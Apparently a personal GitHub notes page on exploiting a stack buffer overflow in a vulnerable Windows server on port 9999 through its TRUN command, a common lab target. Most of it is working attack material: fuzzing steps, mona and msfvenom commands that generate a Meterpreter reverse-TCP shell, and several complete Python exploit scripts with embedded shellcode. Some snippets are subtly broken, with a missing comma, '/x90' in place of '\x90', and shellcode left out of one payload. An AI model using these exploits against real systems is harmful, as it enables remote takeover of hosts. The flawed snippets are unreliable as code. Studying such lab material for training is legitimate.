Buffer overflow

Notes:

  • EIP Register is our middleman, if we can exploit it, we can execute our payload.

  • ESP Register is where we execute our commands

  • Bad chars

badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Steps(old):

  1. Fuzz the server till it crash

    generic_send_tcp 192.168.1.10 9999 trun.spk 0 0
    

    fuzz.spk

    s_readline();
    s_string("STATS ");
    s_string_variable("0");
    
  2. Now analyze the dump and figure the difference between first and last hex pointers.

  3. With msf-pattern_create -l 3000 we create the pattern and pass it to python exploit. (3000- because its close to 2984)

  4. Now create the python exploit

    import socket
    
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    
    payload = [
        b"TRUN /:./",
    		b"asdasdasdsadadas" #output of msf-pattern-create
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  5. Now copy the EIP Address from the immunity debugger

  6. msf-pattern_offset -l 3000 -q 386F4337 # output of EIP

    msf-pattern_offset -l 3000 -q 386F4337                                                                                                                                      
    [*] Exact match at offset 2003
  7. Python Exploit

    import socket
    
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset= 2003
    payload = [
        b"TRUN /:./",
    		b"A"*offset
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  8. After copying mona.py, excute !mona jmp -r esp to find valid registry points to jump to esp

  9. Find a register with more false and preferably ascii

    import socket
    import struct
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset = 2003 #output of msf-offset
    new_eip = struct.pack("<I", 0x62501203) 
    
    payload = [
        b"TRUN /:./",
        b"A"*offset
        new_eip
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  10. Look for bad characters

    import socket
    import struct
    s =socket.socket()
    s.connect(("192.168.1.10", 9999))
    total_length = 2984 # The diff between hex pointers
    offset = 2003 #output of msf-offset
    new_eip = struct.pack("<I", 0x62501203) 
    badchars = (
      "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
      "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
      "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
      "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
      "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
      "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
      "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
      "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
      "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
      "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
      "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
      "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
      "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
      "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
      "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
      "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )
    
    payload = [
        b"TRUN /:./",
        b"A"*offset,
        new_eip,
    		badchars
    ]
    payload = b"".join(payload)
    s.send(payload)
    s.close()
  11. Now check in the proccess dump for any bad characters, any letters missing or out of place

  12. Genereate shellcode using msfvenom #Add more bad chars if any in -b "/x00/xff"

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1212 EXITFUNC= thread -f pye x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d"
    #exitfunc, so that the service doesnt terminate when the shell is terminated
    1. Note that payload size, it + offset < total_length
  13. Now add nop_sled & complete the buffer with any other string(ex: c)

```python
import socket
import struct
s =socket.socket()
s.connect(("192.168.1.10", 9999))
total_length = 2984 # The diff between hex pointers
offset = 2003 #output of msf-offset
new_eip = struct.pack("<I", 0x62501203) 
nop_sled = b"/x90" * 16
buf =  b""
buf += b"\xdb\xdc\xb8\x99\xdb\xf6\x1e\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x59\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x7b"
buf += b"\x2e\x0a\xf6\xf4\xd1\xf3\x07\x6a\x5b\x16\x36\xb8\x3f"
buf += b"\x52\x6b\x0c\x4b\x36\x80\xe7\x19\xa3\xa9\x08\x16\xb9"
buf += b"\xe1\xf9\x9e\x74\xd4\x34\x21\x24\x24\x57\xdd\x37\x79"
buf += b"\xb7\xdc\xf7\x8c\xb6\x19\x4e\xfa\x57\xf7\xda\x56\xb7"
buf += b"\xaf\x57\x14\x8b\x4e\xb8\x12\xb3\x28\xbd\xe5\x47\x85"
buf += b"\xbc\x35\x2c\x4d\x9f\xb4\xe1\x3e\x54\xfe\x1d\x3a\xa3"
buf += b"\x8b\x21\x75\xcb\x3d\xd2\x41\xb8\xbf\x32\x98\x7e\x7e"
buf += b"\x75\xd6\xd2\x80\x4e\xd1\xca\xf6\xa4\x21\x76\x01\x7f"
buf += b"\x5b\xac\x84\x9f\xfb\x27\x3e\x7b\xfd\xe4\xd9\x08\xf1"
buf += b"\x41\xad\x56\x16\x57\x62\xed\x22\xdc\x85\x21\xa3\xa6"
buf += b"\xa1\xe5\xef\x7d\xcb\xbc\x55\xd3\xf4\xde\x32\x8c\x50"
buf += b"\x95\xd1\xdb\xe5\x56\x2a\xe4\xbb\xc0\xe6\x29\x44\x10"
buf += b"\x61\x39\x37\x22\x2e\x91\xdf\x0e\xa7\x3f\x27\x07\xaf"
buf += b"\xbf\xf7\xaf\xa0\x41\xf8\xcf\xe9\x85\xac\x9f\x81\x2c"
buf += b"\xcd\x74\x52\xd0\x18\xe0\x58\x46\x63\x5c\x5d\x80\x0b"
buf += b"\x9e\x5e\xa8\x77\x17\xb8\xe0\xd7\x77\x15\x41\x88\x37"
buf += b"\xc5\x29\xc2\xb8\x3a\x49\xed\x13\x53\xe0\x02\xcd\x0b"
buf += b"\x9d\xbb\x54\xc7\x3c\x43\x43\xad\x7f\xcf\x61\x51\x31"
buf += b"\x38\x00\x41\x26\x5f\xea\x99\xb7\xca\xea\xf3\xb3\x5c"
buf += b"\xbd\x6b\xbe\xb9\x89\x33\x41\xec\x8a\x34\xbd\x71\xba"
buf += b"\x4f\x88\xe7\x82\x27\xf5\xe7\x02\xb8\xa3\x6d\x02\xd0"
buf += b"\x13\xd6\x51\xc5\x5b\xc3\xc6\x56\xce\xec\xbe\x0b\x59"
buf += b"\x85\x3c\x75\xad\x0a\xbf\x50\xad\x4d\x3f\x26\x9a\xf5"
buf += b"\x57\xd8\x9a\x05\xa7\xb2\x1a\x56\xcf\x49\x34\x59\x3f"
buf += b"\xb1\x9f\x32\x57\x38\x4e\xf0\xc6\x3d\x5b\x54\x56\x3d"
buf += b"\x68\x4d\x69\x44\x01\x72\x8a\xb9\x0b\x17\x8b\xb9\x33"
buf += b"\x29\xb0\x6f\x0a\x5f\xf7\xb3\x29\x50\x42\x91\x18\xfb"
buf += b"\xac\x85\x5b\x2e"

shellcode = buf

payload = [
    b"TRUN /:./",
    b"A"*offset,
    new_eip,
    nop_sled,
    b"C"* (total_length - offset - len(new_eip) - len(nop_sled)- len(shellcode)) 
]
payload = b"".join(payload)
s.send(payload)
s.close()
```

Without pwntools

import socket
import sys

username = b"heath"
message = b"A" * 2012 + b"/xdf/x14/x50/x62" + b"/x90" * 32

buf =  b""
buf += b"\xdb\xdc\xb8\x99\xdb\xf6\x1e\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x59\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x7b"
buf += b"\x2e\x0a\xf6\xf4\xd1\xf3\x07\x6a\x5b\x16\x36\xb8\x3f"
buf += b"\x52\x6b\x0c\x4b\x36\x80\xe7\x19\xa3\xa9\x08\x16\xb9"
buf += b"\xe1\xf9\x9e\x74\xd4\x34\x21\x24\x24\x57\xdd\x37\x79"
buf += b"\xb7\xdc\xf7\x8c\xb6\x19\x4e\xfa\x57\xf7\xda\x56\xb7"
buf += b"\xaf\x57\x14\x8b\x4e\xb8\x12\xb3\x28\xbd\xe5\x47\x85"
buf += b"\xbc\x35\x2c\x4d\x9f\xb4\xe1\x3e\x54\xfe\x1d\x3a\xa3"
buf += b"\x8b\x21\x75\xcb\x3d\xd2\x41\xb8\xbf\x32\x98\x7e\x7e"
buf += b"\x75\xd6\xd2\x80\x4e\xd1\xca\xf6\xa4\x21\x76\x01\x7f"
buf += b"\x5b\xac\x84\x9f\xfb\x27\x3e\x7b\xfd\xe4\xd9\x08\xf1"
buf += b"\x41\xad\x56\x16\x57\x62\xed\x22\xdc\x85\x21\xa3\xa6"
buf += b"\xa1\xe5\xef\x7d\xcb\xbc\x55\xd3\xf4\xde\x32\x8c\x50"
buf += b"\x95\xd1\xdb\xe5\x56\x2a\xe4\xbb\xc0\xe6\x29\x44\x10"
buf += b"\x61\x39\x37\x22\x2e\x91\xdf\x0e\xa7\x3f\x27\x07\xaf"
buf += b"\xbf\xf7\xaf\xa0\x41\xf8\xcf\xe9\x85\xac\x9f\x81\x2c"
buf += b"\xcd\x74\x52\xd0\x18\xe0\x58\x46\x63\x5c\x5d\x80\x0b"
buf += b"\x9e\x5e\xa8\x77\x17\xb8\xe0\xd7\x77\x15\x41\x88\x37"
buf += b"\xc5\x29\xc2\xb8\x3a\x49\xed\x13\x53\xe0\x02\xcd\x0b"
buf += b"\x9d\xbb\x54\xc7\x3c\x43\x43\xad\x7f\xcf\x61\x51\x31"
buf += b"\x38\x00\x41\x26\x5f\xea\x99\xb7\xca\xea\xf3\xb3\x5c"
buf += b"\xbd\x6b\xbe\xb9\x89\x33\x41\xec\x8a\x34\xbd\x71\xba"
buf += b"\x4f\x88\xe7\x82\x27\xf5\xe7\x02\xb8\xa3\x6d\x02\xd0"
buf += b"\x13\xd6\x51\xc5\x5b\xc3\xc6\x56\xce\xec\xbe\x0b\x59"
buf += b"\x85\x3c\x75\xad\x0a\xbf\x50\xad\x4d\x3f\x26\x9a\xf5"
buf += b"\x57\xd8\x9a\x05\xa7\xb2\x1a\x56\xcf\x49\x34\x59\x3f"
buf += b"\xb1\x9f\x32\x57\x38\x4e\xf0\xc6\x3d\x5b\x54\x56\x3d"
buf += b"\x68\x4d\x69\x44\x01\x72\x8a\xb9\x0b\x17\x8b\xb9\x33"
buf += b"\x29\xb0\x6f\x0a\x5f\xf7\xb3\x29\x50\x42\x91\x18\xfb"
buf += b"\xac\x85\x5b\x2e"

payload = buf

try: 
    print('Sending payload .......')
    s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.1.14',9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b'/r/n')
    s.recv(1024)
    s.send(message + payload + b'/r/n')
    s.recv(1024)
    s.close
except:
    print('Cannot connect to server')
    sys.exit()

Finding jumps using mona:

!mona jmp -r esp -cpb "\x00"

Finding offsets using mona:

!mona findmsp -distance 600

Automating(bad chars) with mona:

!mona config -set workingfolder C:\mona
!mona bytearray -b "\x00"
!mona compare -f C:\mona\bytearray.bin -a <esp addr>

With pwntools

#!/usr/bin/env python3
from pwn import *

host = "192.168.1.14"
port = 9999
cmd = b"TRUN /.:/" # cmd to run can be found after spiking
jmp_esp = 0x625011af # jump point !mona jmp -r esp
buf =  b""
buf += b"\xb8\xaa\x8c\x9d\xa6\xd9\xce\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x5e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2"
buf += b"\x5f\x70\x75\x29\x9f\x89\x86\x56\x16\x6c\xb7\x44\x4c"
buf += b"\xe4\xea\x58\x07\xa8\x06\x12\x45\x59\x26\xdb\xe2\x13"
buf += b"\x60\x2c\x43\x99\x56\x03\x6b\xb2\xab\x02\x17\xc9\xff"
buf += b"\xe4\x26\x02\xf2\xe5\x6f\xd4\x78\x09\x3d\x6c\xd0\xc5"
buf += b"\x96\xf9\x97\xd9\x19\x2e\x9c\x62\x61\x4b\x63\x16\xdd"
buf += b"\x52\xb4\x5c\x85\x74\x64\xe8\x7d\x6d\x85\x3d\xf8\x44"
buf += b"\xf1\xfd\x4b\xdc\xce\x76\x7a\x1d\x2f\x5f\x4d\x21\x9c"
buf += b"\x9e\x62\xac\xdc\xe7\x44\x4f\xab\x13\xb7\xf2\xac\xe7"
buf += b"\xca\x28\x38\xf8\x6c\xba\x9a\xdc\x8d\x6f\x7c\x96\x81"
buf += b"\xc4\x0a\xf0\x85\xdb\xdf\x8a\xb1\x50\xde\x5c\x30\x22"
buf += b"\xc5\x78\x19\xf0\x64\xd8\xc7\x57\x98\x3a\xaf\x08\x3c"
buf += b"\x30\x5d\x5e\x40\xb9\x9e\x5f\x1c\x2e\x53\x92\x9f\xae"
buf += b"\xfb\xa5\xec\x9c\xa4\x1d\x7b\xad\x2d\xb8\x7c\xa4\x39"
buf += b"\x3b\x52\x0e\x29\xc5\x53\x6f\x60\x02\x07\x3f\x1a\xa3"
buf += b"\x28\xd4\xda\x4c\xfd\x41\xd0\xda\x3e\x3d\xe5\x0c\xd7"
buf += b"\x3c\xe5\x34\xf5\xc8\x03\x64\xa9\x9a\x9b\xc5\x19\x5b"
buf += b"\x4b\xae\x73\x54\xb4\xce\x7b\xbe\xdd\x65\x94\x17\xb6"
buf += b"\x11\x0d\x32\x4c\x83\xd2\xe8\x29\x83\x59\x19\xce\x4a"
buf += b"\xaa\x68\xdc\xbb\xcd\x92\x1c\x3c\x78\x93\x76\x38\x2a"
buf += b"\xc4\xee\x42\x0b\x22\xb1\xbd\x7e\x30\xb5\x42\xff\x01"
buf += b"\xce\x75\x95\x2d\xb8\x79\x79\xae\x38\x2c\x13\xae\x50"
buf += b"\x88\x47\xfd\x45\xd7\x5d\x91\xd6\x42\x5e\xc0\x8b\xc5"
buf += b"\x36\xee\xf2\x22\x99\x11\xd1\x30\xde\xee\xa4\x1e\x47"
buf += b"\x87\x56\x1f\x77\x57\x3c\x9f\x27\x3f\xcb\xb0\xc8\x8f"
buf += b"\x34\x1b\x81\x87\xbf\xca\x63\x39\xc0\xc6\x22\xe7\xc1"
buf += b"\xe5\xfe\x18\xb8\x86\x01\xd9\x3d\x8f\x65\xd9\x3e\xaf"
buf += b"\x9b\xe5\xe9\x96\xe9\x28\x2a\xad\xf2\xb6\x86\xd8\x9a"
buf += b"\x6e\x43\x61\xc7\x90\xbe\xa6\xfe\x12\x4a\x57\x05\x0a"
buf += b"\x3f\x52\x41\x8c\xac\x2e\xda\x79\xd2\x9d\xdb\xab"
shellcode = buf
padding = b"A"*2003 #output of msf-pattern-offset

payload = cmd
payload += padding
payload += p32(jmp_esp)
payload += b"\x90"*100
payload += shellcode

p = remote(host, port)
p.sendline(payload)

GitHub

View Github